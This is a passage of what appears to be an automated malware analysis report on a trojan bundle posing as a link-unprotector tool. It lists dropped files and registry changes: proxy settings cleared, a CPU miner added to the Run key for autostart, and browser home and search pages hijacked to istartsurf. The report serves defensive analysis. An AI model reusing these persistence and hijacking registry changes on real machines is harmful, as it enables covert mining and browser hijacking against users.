C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE (6223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS (5796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)

Registry activity

The process ProtectService.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "pcm"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process ProtectService.exe:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"

The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "C4 83 39 63 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process ProtectWindowsManager.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "7D 6C C9 96 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process ProtectWindowsManager.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro￿Â"
"TypesSupported" = "7"

The process 15094FED_stp.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"Publisher" = "DesprotetorINC"
"DisplayVersion" = "1.0"
"DisplayName" = "DesProtetor"

[HKLM\SOFTWARE\DesProtetor]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"UninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
"Comments" = "Tenha acesso direto aos links sem passar por nenhum protetor de Links ou publicidades"
"QuietUninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"

The process cpuminer-x11opt-setup.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"InstallLocation" = "C:\Windows\system32"
"DisplayName" = "CPU Miner"
"Publisher" = "Open Source"

"DisplayIcon" = "C:\Windows\system32\cpuminer-gw64.exe"
"EstimatedSize" = "1316"
"DisplayVersion" = "1.1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"

The process DesProtetor.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "13 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process wpm_v20.0.0.2227.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\supWindowsMangerProtect]
"ptid" = "pcm"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayVersion" = "1.2.0"
"DisplayName" = "ActSys"

[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Publisher" = "NINJASOFT LLC"
"QuietUninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: CWxGaP3QbYgwfMaFKJSDGrZa)"

The process QQBrowser.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process QQBrowser.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Mozilla\Extends]
"AppID" = "[email protected]"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"ptid" = "pcm"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"

[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=pcm"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"UninstallString" = "%Program Files% (x86)\WNet\uninst.exe"

[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: aGf9F1GWmcyPdxOIFdIm7cfc)"
"QuietUninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
"DisplayVersion" = "1.0"

The process %original file name%.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "35 BC BD 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
